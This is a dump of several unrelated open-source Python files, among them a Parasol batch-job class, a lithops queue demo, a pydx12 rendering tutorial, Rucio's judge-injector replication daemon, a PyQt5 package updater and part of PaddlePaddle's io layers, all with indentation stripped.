#r 5410186 benedictpaten worker 1247029663 localhost
#r 5410324 benedictpaten worker 1247030076 localhost
runningJobs = {}
issuedJobs = self.getIssuedBatchJobIDs()
for line in popenParasolCommand("%s -results=%s pstat2 " % (self.parasolCommand, self.parasolResultsFile))[1]:
if line != '':
match = self.runningPattern.match(line)
if match != None:
jobID = int(match.group(1))
startTime = int(match.group(2))
if jobID in issuedJobs: #It's one of our jobs
runningJobs[jobID] = time.time() - startTime
return runningJobs
def getUpdatedBatchJob(self, maxWait):
jobID = self.getFromQueueSafely(self.outputQueue2, maxWait)
if jobID != None:
self.outputQueue2.task_done()
return jobID
@classmethod
def getRescueBatchJobFrequency(cls):
"""Parasol leaks jobs, but rescuing jobs involves calls to parasol list jobs and pstat2,
making it expensive.
"""
return 5400 #Once every 90 minutes
def shutdown(self):
pass
def main():
pass
def _test():
import doctest
return doctest.testmod()
if __name__ == '__main__':
_test()
main()
|
buffered_queue.py
|
import lithops.multiprocessing as mp
from lithops.multiprocessing import Process, Queue
import time
import random
from queue import Empty  # Queue.get(timeout=...) raises queue.Empty, as with multiprocessing.Queue
def work(remote_queue):
for i in range(5):
remote_queue.put('Working hard ... {}'.format(i))
time.sleep(random.random())
if __name__ == '__main__':
queue = Queue()
process = Process(target=work, args=(queue,))
# ctx = mp.get_context('spawn')
# queue = ctx.Queue()
# process = ctx.Process(target=work, args=(queue,))
process.start()
process.join()
while True:
try:
data = queue.get(timeout=3)
print(data)
        except Empty:
print('Queue empty!')
break
|
tutorial014.py
|
import time
from pydx12 import *
from utils import get_best_adapter, enable_debug, print_debug, setup_debug, Barrier, Rasterizer, Mesh, GLTF
from PIL import Image
import gc
import sys
import random
import numpy
import threading
from queue import Queue
from pyrr import matrix44
import struct
enable_debug()
device = D3D12CreateDevice(get_best_adapter())
print(device)
setup_debug(device)
print('DEBUG SET')
window = Window('pydx12: Tutorial 011 (SwapChain)', 1024, 1024)
print(window)
command_queue_desc = D3D12_COMMAND_QUEUE_DESC(
Type=D3D12_COMMAND_LIST_TYPE_DIRECT)
queue = device.CreateCommandQueue(command_queue_desc)
swap_chain_desc1 = DXGI_SWAP_CHAIN_DESC1(Format=DXGI_FORMAT_R8G8B8A8_UNORM, BufferUsage=DXGI_USAGE_RENDER_TARGET_OUTPUT,
BufferCount=2, Scaling=DXGI_SCALING_STRETCH, SwapEffect=DXGI_SWAP_EFFECT_FLIP_DISCARD)
swap_chain_desc1.SampleDesc.Count = 1
swap_chain = CreateDXGIFactory2().CreateSwapChainForHwnd(
queue, window, swap_chain_desc1)
descriptor_heap_desc = D3D12_DESCRIPTOR_HEAP_DESC(
Type=D3D12_DESCRIPTOR_HEAP_TYPE_RTV,
NumDescriptors=2)
descriptor_heap = device.CreateDescriptorHeap(descriptor_heap_desc)
rtvs = descriptor_heap.cpu((0, 1))
device.CreateRenderTargetView(swap_chain.GetBuffer(0), None, rtvs[0])
device.CreateRenderTargetView(swap_chain.GetBuffer(1), None, rtvs[1])
gltf = GLTF('Duck.gltf')
mesh = Mesh(device)
#print(gltf.get_indices(0), gltf.get_vertices(0), gltf.get_nvertices(0))
#print(len(gltf.get_indices(0)), len(gltf.get_vertices(0)), gltf.get_nvertices(0))
mesh.set_index_buffer(gltf.get_indices(0))
mesh.set_vertex_buffer(gltf.get_vertices(0))
try:
mesh.set_color_buffer(gltf.get_colors(0))
except Exception:  # the glTF may have no per-vertex colors; fall back to a constant color buffer
mesh.set_color_buffer(struct.pack('f', 1) * mesh.npositions)
mesh.set_nvertices(gltf.get_nvertices(0))
rasterizer = Rasterizer(device)
running = True
fps = 0
message_queue = Queue()
def render_loop():
theta = 0
forward = 0
fence = device.CreateFence()
fence_event = Event()
fence_value = fence.GetCompletedValue()
fence_value += 1
frame_counter = 0
counter = 0
frequency = QueryPerformanceFrequency()
now = QueryPerformanceCounter()
while running:
theta += 0.05
forward = -2 # 10.01
scale = matrix44.create_from_scale((1, 1, 1), dtype='float32')
rotation = matrix44.create_from_y_rotation(theta, dtype='float32')
translation = matrix44.create_from_translation(
(0, 0, forward), dtype='float32')
perspective = matrix44.create_perspective_projection(
60., 1., 0.1, 1000., dtype='float32')
#mesh.matrix = scale @ rotation @ translation @ perspective
mesh.matrix = scale @ rotation @ translation @ perspective
back_buffer_index = swap_chain.GetCurrentBackBufferIndex()
back_buffer = swap_chain.GetBuffer(back_buffer_index)
rasterizer.execute(queue, back_buffer,
rtvs[back_buffer_index], [mesh])
queue.Signal(fence, fence_value)
if fence.GetCompletedValue() < fence_value:
fence.SetEventOnCompletion(fence_value, fence_event)
fence_event.wait()
fence_value += 1
swap_chain.Present(1)
new_now = QueryPerformanceCounter()
counter += new_now - now
now = new_now
if counter >= frequency:
counter -= frequency
fps = frame_counter
message_queue.put(str(fps))
frame_counter = 1
else:
frame_counter += 1
t = threading.Thread(target=render_loop)
t.start()
while running:
window.dequeue()
if not message_queue.empty():
new_title = message_queue.get_nowait()
window.set_title(new_title)
running = False
t.join()
print('END')
|
injector.py
|
# -*- coding: utf-8 -*-
# Copyright 2015-2021 CERN
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Authors:
# - Martin Barisits <martin.barisits@cern.ch>, 2015-2021
# - Vincent Garonne <vincent.garonne@cern.ch>, 2018
# - Hannes Hansen <hannes.jakob.hansen@cern.ch>, 2018-2019
# - Brandon White <bjwhite@fnal.gov>, 2019
# - Thomas Beermann <thomas.beermann@cern.ch>, 2020-2021
# - Benedikt Ziemons <benedikt.ziemons@cern.ch>, 2020
# - Eric Vaandering <ewv@fnal.gov>, 2020
"""
Judge-Injector is a daemon to asynchronously create replication rules
"""
import logging
import os
import socket
import threading
import time
from copy import deepcopy
from datetime import datetime, timedelta
from random import randint
from re import match
from sqlalchemy.exc import DatabaseError
import rucio.db.sqla.util
from rucio.common.logging import formatted_logger, setup_logging
from rucio.common.exception import (DatabaseException, RuleNotFound, RSEWriteBlocked,
ReplicationRuleCreationTemporaryFailed, InsufficientAccountLimit)
from rucio.core.heartbeat import live, die, sanity_check
from rucio.core.monitor import record_counter
from rucio.core.rule import inject_rule, get_injected_rules, update_rule
graceful_stop = threading.Event()
def rule_injector(once=False):
"""
Main loop to check for asynchronous creation of replication rules
"""
hostname = socket.gethostname()
pid = os.getpid()
current_thread = threading.current_thread()
paused_rules = {} # {rule_id: datetime}
    # Make an initial heartbeat so that all judge-injectors have the correct worker number on the next try
executable = 'judge-injector'
heartbeat = live(executable=executable, hostname=hostname, pid=pid, thread=current_thread, older_than=2 * 60 * 60)
prefix = 'judge-injector[%i/%i] ' % (heartbeat['assign_thread'], heartbeat['nr_threads'])
logger = formatted_logger(logging.log, prefix + '%s')
graceful_stop.wait(1)
while not graceful_stop.is_set():
try:
# heartbeat
heartbeat = live(executable=executable, hostname=hostname, pid=pid, thread=current_thread, older_than=2 * 60 * 60)
prefix = 'judge-injector[%i/%i] ' % (heartbeat['assign_thread'], heartbeat['nr_threads'])
logger = formatted_logger(logging.log, prefix + '%s')
start = time.time()
# Refresh paused rules
iter_paused_rules = deepcopy(paused_rules)
for key in iter_paused_rules:
if datetime.utcnow() > paused_rules[key]:
del paused_rules[key]
rules = get_injected_rules(total_workers=heartbeat['nr_threads'],
worker_number=heartbeat['assign_thread'],
limit=100,
blocked_rules=[key for key in paused_rules])
logger(logging.DEBUG, 'index query time %f fetch size is %d' % (time.time() - start, len(rules)))
if not rules and not once:
logger(logging.DEBUG, 'did not get any work (paused_rules=%s)' % str(len(paused_rules)))
graceful_stop.wait(60)
else:
for rule in rules:
rule_id = rule[0]
logger(logging.INFO, 'Injecting rule %s' % rule_id)
if graceful_stop.is_set():
break
try:
start = time.time()
inject_rule(rule_id=rule_id, logger=logger)
logger(logging.DEBUG, 'injection of %s took %f' % (rule_id, time.time() - start))
except (DatabaseException, DatabaseError) as e:
if match('.*ORA-00054.*', str(e.args[0])):
paused_rules[rule_id] = datetime.utcnow() + timedelta(seconds=randint(60, 600))
record_counter('rule.judge.exceptions.LocksDetected')
logger(logging.WARNING, 'Locks detected for %s' % rule_id)
elif match('.*QueuePool.*', str(e.args[0])):
logger(logging.WARNING, 'DatabaseException', exc_info=True)
record_counter('rule.judge.exceptions.%s' % e.__class__.__name__)
elif match('.*ORA-03135.*', str(e.args[0])):
logger(logging.WARNING, 'DatabaseException', exc_info=True)
record_counter('rule.judge.exceptions.%s' % e.__class__.__name__)
else:
logger(logging.ERROR, 'DatabaseException', exc_info=True)
record_counter('rule.judge.exceptions.%s' % e.__class__.__name__)
except (RSEWriteBlocked) as e:
paused_rules[rule_id] = datetime.utcnow() + timedelta(seconds=randint(60, 600))
logger(logging.WARNING, 'RSEWriteBlocked for rule %s' % rule_id)
record_counter('rule.judge.exceptions.%s' % e.__class__.__name__)
except ReplicationRuleCreationTemporaryFailed as e:
paused_rules[rule_id] = datetime.utcnow() + timedelta(seconds=randint(60, 600))
logger(logging.WARNING, 'ReplicationRuleCreationTemporaryFailed for rule %s' % rule_id)
record_counter('rule.judge.exceptions.%s' % e.__class__.__name__)
except RuleNotFound:
pass
except InsufficientAccountLimit:
# A rule with InsufficientAccountLimit on injection hangs there potentially forever
# It should be marked as SUSPENDED
logger(logging.INFO, 'Marking rule %s as SUSPENDED due to InsufficientAccountLimit' % rule_id)
update_rule(rule_id=rule_id, options={'state': 'SUSPENDED'})
except (DatabaseException, DatabaseError) as e:
if match('.*QueuePool.*', str(e.args[0])):
logger(logging.WARNING, 'DatabaseException', exc_info=True)
record_counter('rule.judge.exceptions.%s' % e.__class__.__name__)
elif match('.*ORA-03135.*', str(e.args[0])):
logger(logging.WARNING, 'DatabaseException', exc_info=True)
record_counter('rule.judge.exceptions.%s' % e.__class__.__name__)
else:
logger(logging.CRITICAL, 'DatabaseException', exc_info=True)
record_counter('rule.judge.exceptions.%s' % e.__class__.__name__)
except Exception as e:
logger(logging.CRITICAL, 'Exception', exc_info=True)
record_counter('rule.judge.exceptions.%s' % e.__class__.__name__)
if once:
break
die(executable=executable, hostname=hostname, pid=pid, thread=current_thread)
def stop(signum=None, frame=None):
"""
Graceful exit.
"""
graceful_stop.set()
def run(once=False, threads=1):
"""
Starts up the Judge-Injector threads.
"""
setup_logging()
if rucio.db.sqla.util.is_old_db():
raise DatabaseException('Database was not updated, daemon won\'t start')
executable = 'judge-injector'
hostname = socket.gethostname()
sanity_check(executable=executable, hostname=hostname)
if once:
rule_injector(once)
else:
logging.info('Injector starting %s threads' % str(threads))
threads = [threading.Thread(target=rule_injector, kwargs={'once': once}) for i in range(0, threads)]
[t.start() for t in threads]
# Interruptible joins require a timeout.
while threads[0].is_alive():
[t.join(timeout=3.14) for t in threads]
|
updater.py
|
import sys
import subprocess
import threading
import os
import PyQt5
from PyQt5.QtGui import QPixmap
from PyQt5.QtWidgets import QLabel, QApplication, QSizePolicy, QDesktopWidget, QWidget
from abspath import abspath
class Window(QWidget):
def __init__(self):
super().__init__()
self.left = 0
self.top = 0
self.width = 242
self.height = 242
self.label = QLabel(self)
self.setGeometry(self.left, self.top, self.width, self.height)
self.setFixedSize(self.width, self.height)
self.upgradelist = ["osr2mp4", "osr2mp4app"]
self.setSizePolicy(QSizePolicy(QSizePolicy.Ignored, QSizePolicy.Ignored))
self.a = threading.Thread(target=self.install)
self.osrLogoUpdater()
def osrLogoUpdater(self):
pixmap = QPixmap(os.path.join(abspath, 'res/OsrUpdater.png'))
self.setFixedSize(pixmap.width(), pixmap.height())
self.label.setPixmap(pixmap)
self.setAttribute(PyQt5.QtCore.Qt.WA_TranslucentBackground)
self.setWindowFlags(PyQt5.QtCore.Qt.FramelessWindowHint)
self.center()
self.show()
def center(self):
qr = self.frameGeometry()
cp = QDesktopWidget().availableGeometry().center()
qr.moveCenter(cp)
self.move(qr.topLeft())
def install(self):
for i in self.upgradelist:
subprocess.call([sys.executable, "-m", "pip", "install", i, "--upgrade"])
QApplication.quit()
qtpath = os.path.dirname(PyQt5.__file__)
pluginpath = os.path.join(qtpath, "Qt/plugins")
os.environ['QT_QPA_PLATFORM_PLUGIN_PATH'] = pluginpath
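# The env var above points Qt at PyQt5's bundled platform plugins so the window can still be
# created after an in-place upgrade (the "Qt/plugins" layout is assumed from a typical PyQt5 wheel).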
app = QApplication([])
window = Window()
window.a.start()
app.exec_()
window.a.join()
|
io.py
|
# Copyright (c) 2018 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
from ..wrapped_decorator import signature_safe_contextmanager
import multiprocessing
import os
import six
import threading
from ..data_feeder import DataFeeder
from .control_flow import BlockGuard
from .layer_function_generator import templatedoc
from .. import core
from ..executor import global_scope
from ..framework import convert_np_dtype_to_dtype_, default_main_program, \
default_startup_program, program_guard, Program, Variable
from ..layer_helper import LayerHelper
from ..unique_name import generate as unique_name
import logging
__all__ = [
'data', 'open_files', 'read_file', 'shuffle', 'batch', 'double_buffer',
'random_data_generator', 'py_reader', 'create_py_reader_by_data',
'Preprocessor', 'load'
]
def data(name,
shape,
append_batch_size=True,
dtype='float32',
lod_level=0,
type=core.VarDesc.VarType.LOD_TENSOR,
stop_gradient=True):
"""
**Data Layer**
    This function takes in the input and, based on whether the data has to be
    returned back as a minibatch, creates the global variable by using the
    helper functions. The global variables can be accessed by all the
    following operators in the graph.
All the input variables of this function are passed in as local variables
to the LayerHelper constructor.
Notice that paddle would only use :code:`shape` to infer the shapes of
following variables in the network during compile-time. During run-time,
    paddle would not check whether the shape of the fed data matches the
:code:`shape` settings in this function.
Args:
name(str): The name/alias of the function
shape(list): Tuple declaring the shape. If :code:`append_batch_size` is
True and there is no -1 inside :code:`shape`, it should be
            considered as the shape of each sample. Otherwise, it
should be considered as the shape of the batched data.
append_batch_size(bool):
1. If true, it prepends -1 to the shape.
For example if shape=[1], the resulting shape is [-1, 1]. This will
be useful to set different batch size at run time.
2. If shape contains -1, such as shape=[1, -1].
            append_batch_size will be enforced to be False (ineffective)
because PaddlePaddle cannot set more than 1 unknown number on the
shape.
        dtype(np.dtype|VarType|str): The type of data: float32, float16, int, etc.
type(VarType): The output type. By default it is LOD_TENSOR.
lod_level(int): The LoD Level. 0 means the input data is not a sequence.
stop_gradient(bool): A boolean that mentions whether gradient should flow.
Returns:
Variable: The global variable that gives access to the data.
Examples:
.. code-block:: python
import paddle.fluid as fluid
data = fluid.layers.data(name='x', shape=[784], dtype='float32')
"""
helper = LayerHelper('data', **locals())
shape = list(shape)
for i in six.moves.range(len(shape)):
if shape[i] is None:
shape[i] = -1
append_batch_size = False
elif shape[i] < 0:
append_batch_size = False
if append_batch_size:
shape = [-1] + shape # append batch size as -1
data_var = helper.create_global_variable(
name=name,
shape=shape,
dtype=dtype,
type=type,
stop_gradient=stop_gradient,
lod_level=lod_level,
is_data=True)
return data_var
class BlockGuardServ(BlockGuard):
"""
    BlockGuardServ is used to create an op with a block in a program.
"""
def __init__(self, server):
if not (isinstance(server, ListenAndServ)):
raise TypeError("BlockGuardServ takes a ListenAndServ")
super(BlockGuardServ, self).__init__(server.helper.main_program)
self.server = server
def __exit__(self, exc_type, exc_val, exc_tb):
if exc_type is not None:
return False
self.server.complete_op()
return super(BlockGuardServ, self).__exit__(exc_type, exc_val, exc_tb)
class ListenAndServ(object):
"""
**ListenAndServ Layer**
    ListenAndServ is used to create an RPC server that binds and listens
    on a specific TCP port; the server runs the sub-block when it
    receives variables from clients.
Args:
endpoint(string): IP:port string which the server will listen on.
inputs(list): a list of variables that the server will get from clients.
        fan_in(int): how many clients are expected to report to this server, default: 1.
optimizer_mode(bool): whether to run the server as a parameter server, default: True.
Examples:
.. code-block:: python
import paddle.fluid as fluid
with fluid.program_guard(main):
serv = layers.ListenAndServ(
"127.0.0.1:6170", ["X"], optimizer_mode=False)
with serv.do():
x = layers.data(
shape=[32, 32],
dtype='float32',
name="X",
append_batch_size=False)
fluid.initializer.Constant(value=1.0)(x, main.global_block())
layers.scale(x=x, scale=10.0, out=out_var)
exe = fluid.Executor(place)
exe.run(main)
"""
def __init__(self, endpoint, inputs, fan_in=1, optimizer_mode=True):
self.helper = LayerHelper("listen_and_serv")
self.inputs = inputs
self.outputs = []
self.endpoint = endpoint
self.fan_in = fan_in
# FIXME(typhoonzero): add optimizer_mode is stupid, should make it more
# general.
self.optimizer_mode = optimizer_mode
def do(self):
return BlockGuardServ(self)
def get_params_and_grads(self):
main_program = self.helper.main_program
current_block = main_program.current_block()
parent_block = self.parent_block()
# params and grads in the same order.
params = list()
grads = list()
for op in current_block.ops:
# FIXME(typhoonzero): op.inputs is None if it's cloned.
if self.optimizer_mode:
if "Grad" in op.inputs and "Param" in op.inputs:
params.append(op.inputs["Param"].name)
grads.append(op.inputs["Grad"].name)
else:
# simple recv mode, recv operators inputs.
for iname in op.input_names:
for in_var_name in op.input(iname):
params.append(parent_block.var(in_var_name))
grads.append(parent_block.var(in_var_name))
return params, grads
def parent_block(self):
prog = self.helper.main_program
parent_idx = prog.current_block().parent_idx
assert parent_idx >= 0
parent_block = prog.block(parent_idx)
return parent_block
def complete_op(self):
main_program = self.helper.main_program
current_block = main_program.current_block()
parent_block = self.parent_block()
parent_block.append_op(
type='listen_and_serv',
inputs={"X": self.inputs},
outputs={},
attrs={
'endpoint': self.endpoint,
'Fanin': self.fan_in,
'optimize_blocks': [
current_block
                ],  # does not support multiple optimize blocks in layers yet
                'sync_mode': True,  # does not support async in layers yet
'grad_to_block_id': [""]
})
def Send(endpoints, send_vars, dummy_output=None, sync=True):
"""
    Send variables to the server side, and get vars from the server
    side when the server has finished running the server-side program.
Args:
        endpoints (str): comma-separated IP:PORT pairs in the order
of send_vars to send
send_vars (list): variables to send to server
sync (bool): whether to wait the request finish
"""
assert (type(send_vars) == list)
if dummy_output is None:
dummy_output = []
elif isinstance(dummy_output, Variable):
dummy_output = [dummy_output]
assert (type(dummy_output) == list)
epmap = endpoints.split(",")
endpoints = list(set(epmap))
helper = LayerHelper("Send", **locals())
rpc_op_role_name = core.op_proto_and_checker_maker.kOpRoleAttrName()
helper.append_op(
type="send",
inputs={"X": send_vars},
outputs={"Out": dummy_output},
attrs={
"endpoints": endpoints,
"epmap": epmap,
rpc_op_role_name: core.op_proto_and_checker_maker.OpRole.RPC
})
if sync:
helper.append_op(
type="send_barrier",
inputs={"X": dummy_output},
outputs={"Out": []},
attrs={"endpoints": endpoints})
def Recv(endpoints, get_vars, dummy_input=None, sync=True):
"""
Receive variables from server side
Args:
        endpoints (str): comma-separated IP:PORT pairs in the order
of send_vars to send
get_vars (list): vars to get from server after send completes.
sync (bool): whether to wait the request finish
Returns:
list: list of received variables
"""
assert (type(get_vars) == list)
if dummy_input is None:
dummy_input = []
elif isinstance(dummy_input, Variable):
dummy_input = [dummy_input]
assert (type(dummy_input) == list)
epmap = endpoints.split(",")
endpoints = list(set(epmap))
helper = LayerHelper("Recv", **locals())
helper.append_op(
type="recv",
inputs={"X": dummy_input},
outputs={"Out": get_vars},
attrs={"endpoints": endpoints,
"epmap": epmap})
if sync:
helper.append_op(
type="fetch_barrier",
outputs={"Out": get_vars},
attrs={"endpoints": endpoints})
return get_vars
def monkey_patch_reader_methods(reader):
def __get_reader__():
scope = global_scope()
var = scope.find_var(reader.name)
return var.get_reader()
def reset():
return __get_reader__().reset()
reader.reset = reset
reader.stop_gradient = True
reader.persistable = True
return reader
def _copy_reader_var_(block, var):
new_var = block.create_var(name=var.name, type=core.VarDesc.VarType.READER)
new_var.desc.set_shapes(var.desc.shapes())
new_var.desc.set_dtypes(var.desc.dtypes())
new_var.desc.set_lod_levels(var.desc.lod_levels())
new_var.persistable = True
return new_var
def _copy_reader_create_op_(block, op):
input_param_names = op.input_names
new_input_map = {}
for param_name in input_param_names:
new_input_map[param_name] = []
arg_names = op.input(param_name)
for arg_name in arg_names:
new_input_map[param_name].append(block.var(arg_name))
output_param_names = op.output_names
new_output_map = {}
for param_name in output_param_names:
new_output_map[param_name] = []
arg_names = op.output(param_name)
for arg_name in arg_names:
new_output_map[param_name].append(block.var(arg_name))
new_op = block.append_op(
type=op.type,
inputs=new_input_map,
outputs=new_output_map,
attrs=op.all_attrs())
return new_op
@templatedoc(op_type='create_recordio_file_reader')
def open_recordio_file(filename,
shapes,
lod_levels,
dtypes,
pass_num=1,
for_parallel=True):
"""
${comment}
Args:
filename(${filename_type}): ${filename_comment}.
shapes(list): List of tuples which declaring data shapes.
lod_levels(${lod_levels_type}): ${lod_levels_comment}.
dtypes(list): List of strs which declaring data type.
pass_num(int): Number of passes to run.
for_parallel(Bool): Set it as True if you are going to run
subsequent operators in parallel.
Returns:
${out_comment}.
Examples:
>>> import paddle.fluid as fluid
>>> reader = fluid.layers.io.open_recordio_file(
>>> filename='./data.recordio',
>>> shapes=[(3,224,224), (1,)],
>>> lod_levels=[0, 0],
>>> dtypes=['float32', 'int64'])
>>> # Via the reader, we can use 'read_file' layer to get data:
>>> image, label = fluid.layers.io.read_file(reader)
"""
dtypes = [convert_np_dtype_to_dtype_(dt) for dt in dtypes]
shape_concat = []
ranks = []
for shape in shapes:
shape_concat.extend(shape)
ranks.append(len(shape))
var_name = unique_name('open_recordio_file')
startup_blk = default_startup_program().current_block()
startup_var = startup_blk.create_var(name=var_name)
startup_blk.append_op(
type='create_recordio_file_reader',
outputs={'Out': [startup_var]},
attrs={
'shape_concat': shape_concat,
'lod_levels': lod_levels,
'filename': filename,
'ranks': ranks
})
startup_var.desc.set_dtypes(dtypes)
startup_var.persistable = True
main_prog_var = _copy_reader_var_(default_main_program().current_block(),
startup_var)
if pass_num > 1:
main_prog_var = multi_pass(reader=main_prog_var, pass_num=pass_num)
return monkey_patch_reader_methods(main_prog_var)
def random_data_generator(low, high, shapes, lod_levels, for_parallel=True):
"""
Create a uniform random data generator
This layer returns a Reader Variable.
Instead of opening a file and reading data from it, this
Reader Variable generates float uniform random data by itself.
It can be used as a dummy reader to test a network without
opening a real file.
Args:
low(float): The lower bound of data's uniform distribution.
high(float): The upper bound of data's uniform distribution.
shapes(list): List of tuples which declaring data shapes.
lod_levels(list): List of ints which declaring data lod_level.
for_parallel(Bool): Set it as True if you are going to run
subsequent operators in parallel.
Returns:
Variable: A Reader Variable from which we can get random data.
Examples:
.. code-block:: python
import paddle.fluid as fluid
reader = fluid.layers.random_data_generator(
low=0.0,
high=1.0,
shapes=[[3,224,224], [1]],
lod_levels=[0, 0])
# Via the reader, we can use 'read_file' layer to get data:
image, label = fluid.layers.read_file(reader)
"""
dtypes = [core.VarDesc.VarType.FP32] * len(shapes)
shape_concat = []
ranks = []
for shape in shapes:
shape_concat.extend(shape)
ranks.append(len(shape))
var_name = unique_name('random_data_generator')
startup_blk = default_startup_program().current_block()
startup_var = startup_blk.create_var(name=var_name)
startup_blk.append_op(
type='create_random_data_generator',
outputs={'Out': [startup_var]},
attrs={
'low': low,
'high': high,
'shape_concat': shape_concat,
'lod_levels': lod_levels,
'ranks': ranks
})
startup_var.desc.set_dtypes(dtypes)
startup_var.persistable = True
main_prog_var = _copy_reader_var_(default_main_program().current_block(),
startup_var)
return monkey_patch_reader_methods(main_prog_var)
def _py_reader(capacity,
shapes,
dtypes,
lod_levels=None,
name=None,
use_double_buffer=True,
feed_list=None):
if feed_list is not None:
if not isinstance(feed_list, list):
raise TypeError("feed_list should be a list of Variable"
" instead of " + str(type(feed_list)))
lod_levels = []
dtypes = []
shape_concat = []
ranks = []
shapes = []
for feed_data in feed_list:
dtypes.append(feed_data.dtype)
shape_concat.extend(feed_data.shape)
ranks.append(len(feed_data.shape))
shapes.append(feed_data.shape)
lod_levels.append(feed_data.lod_level)
else:
dtypes = [convert_np_dtype_to_dtype_(dt) for dt in dtypes]
shape_concat = []
ranks = []
for shape in shapes:
shape_concat.extend(shape)
ranks.append(len(shape))
if lod_levels is None:
lod_levels = [0] * len(shapes)
if name is None:
queue_name = unique_name('lod_tensor_blocking_queue')
reader_name = unique_name('create_py_reader')
double_buffer_name = unique_name('double_buffer')
else:
queue_name = "_".join([name, "queue"])
reader_name = "_".join([name, "reader"])
double_buffer_name = "_".join([name, "double_buffer"])
var = global_scope().var(queue_name)
feed_queue = core.init_lod_tensor_blocking_queue(var, capacity)
startup_blk = default_startup_program().current_block()
startup_var = startup_blk.create_var(name=reader_name)
startup_blk.append_op(
type='create_py_reader',
inputs={'blocking_queue': [queue_name]},
outputs={'Out': [startup_var]},
attrs={
'shape_concat': shape_concat,
'lod_levels': lod_levels,
'ranks': ranks
})
startup_var.desc.set_dtypes(dtypes)
startup_var.persistable = True
main_prog_var = _copy_reader_var_(default_main_program().current_block(),
startup_var)
reader = monkey_patch_reader_methods(main_prog_var)
if use_double_buffer:
double_buffer_reader = double_buffer(reader, name=double_buffer_name)
# we return a double buffer reader. However, the reset method comes from
# py_reader.
double_buffer_reader.reset = reader.reset
reader = double_buffer_reader
# monkey patch py_reader special methods
reader.queue = feed_queue
current_reset_method = reader.reset
reader.thread = None
reader.tensor_provider = None
reader.exited = False
def start_provide_thread(func):
def __provider_thread__():
try:
for tensors in func():
array = core.LoDTensorArray()
for item in tensors:
if not isinstance(item, core.LoDTensor):
tmp = core.LoDTensor()
tmp.set(item, core.CPUPlace())
item = tmp
array.append(item)
if reader.exited:
break
feed_queue.push(array)
if reader.exited:
break
feed_queue.close()
except Exception as ex:
feed_queue.close()
logging.warn('Your decorated reader has raised an exception!')
raise ex
reader.thread = threading.Thread(target=__provider_thread__)
reader.thread.daemon = True
reader.thread.start()
def __set_tensor_provider__(func):
reader.tensor_provider = func
def __set_paddle_reader__(paddle_reader):
with program_guard(Program(), Program()):
actual_feed_list = feed_list
if actual_feed_list is None:
actual_feed_list = []
counter = 0
for dtype, shape, lod_level in zip(dtypes, shapes, lod_levels):
name = str(counter)
actual_feed_list.append(
data(
name=name,
dtype=dtype,
shape=shape,
lod_level=lod_level))
counter += 1
data_names = [feed_data.name for feed_data in actual_feed_list]
feeder = DataFeeder(
feed_list=actual_feed_list, place=core.CPUPlace())
paddle_reader = feeder.decorate_reader(
paddle_reader, multi_devices=False)
def __tensor_provider__():
for slots in paddle_reader():
yield [slots[data_name] for data_name in data_names]
__set_tensor_provider__(__tensor_provider__)
def __reset__():
current_reset_method()
if reader.thread is not None and reader.tensor_provider is not None:
reader.exited = True
reader.thread.join()
reader.exited = False
def __start__():
start_provide_thread(reader.tensor_provider)
reader.reset = __reset__
reader.decorate_tensor_provider = __set_tensor_provider__
reader.decorate_paddle_reader = __set_paddle_reader__
reader.decorate_batch_generator = __set_tensor_provider__
reader.decorate_sample_list_generator = __set_paddle_reader__
reader.start = __start__
return reader
def py_reader(capacity,
shapes,
dtypes,
lod_levels=None,
name=None,
use_double_buffer=True):
"""
Create a Python reader for data feeding in Python
This layer returns a Reader Variable.
The Reader provides :code:`decorate_paddle_reader()` and
:code:`decorate_tensor_provider()` to set a Python generator as the data
source. More details :ref:`user_guide_use_py_reader_en` . When
:code:`Executor::Run()` is invoked in C++ side, the data from the generator
would be read automatically. Unlike :code:`DataFeeder.feed()`, the data
reading process and :code:`Executor::Run()` process can run in parallel
using :code:`py_reader`. The :code:`start()` method of the Reader should be
called when each pass begins, while the :code:`reset()` method should be
    called when the pass ends and :code:`fluid.core.EOFException` is raised.
Note that :code:`Program.clone()` method cannot clone :code:`py_reader`.
Args:
capacity(int): The buffer capacity maintained by :code:`py_reader`.
shapes(list|tuple): List of tuples which declaring data shapes.
dtypes(list|tuple): List of strs which declaring data type.
lod_levels(list|tuple): List of ints which declaring data lod_level.
        name(basestring): The prefix of the Python queue name and Reader name.
            If None, a name will be generated automatically.
use_double_buffer(bool): Whether use double buffer or not.
Returns:
Variable: A Reader from which we can get feeding data.
Examples:
1. The basic usage of :code:`py_reader` is as follows:
.. code-block:: python
import paddle
import paddle.fluid as fluid
import paddle.dataset.mnist as mnist
def network(image, label):
                # user defined network, here a softmax regression example
predict = fluid.layers.fc(input=image, size=10, act='softmax')
return fluid.layers.cross_entropy(input=predict, label=label)
reader = fluid.layers.py_reader(capacity=64,
shapes=[(-1, 1, 28, 28), (-1, 1)],
dtypes=['float32', 'int64'])
reader.decorate_paddle_reader(
paddle.reader.shuffle(paddle.batch(mnist.train(), batch_size=5),
buf_size=1000))
img, label = fluid.layers.read_file(reader)
loss = network(img, label)
fluid.Executor(fluid.CUDAPlace(0)).run(fluid.default_startup_program())
exe = fluid.ParallelExecutor(use_cuda=True)
for epoch_id in range(10):
reader.start()
try:
while True:
exe.run(fetch_list=[loss.name])
except fluid.core.EOFException:
reader.reset()
fluid.io.save_inference_model(dirname='./model',
feeded_var_names=[img.name, label.name],
target_vars=[loss],
executor=fluid.Executor(fluid.CUDAPlace(0)))
    2. When both training and testing are performed, two different
       :code:`py_reader` readers should be created with different names, e.g.:
.. code-block:: python
import paddle
import paddle.fluid as fluid
import paddle.dataset.mnist as mnist
def network(reader):
img, label = fluid.layers.read_file(reader)
                # User-defined network. Here, a simple regression as an example
predict = fluid.layers.fc(input=img, size=10, act='softmax')
loss = fluid.layers.cross_entropy(input=predict, label=label)
return fluid.layers.mean(loss)
# Create train_main_prog and train_startup_prog
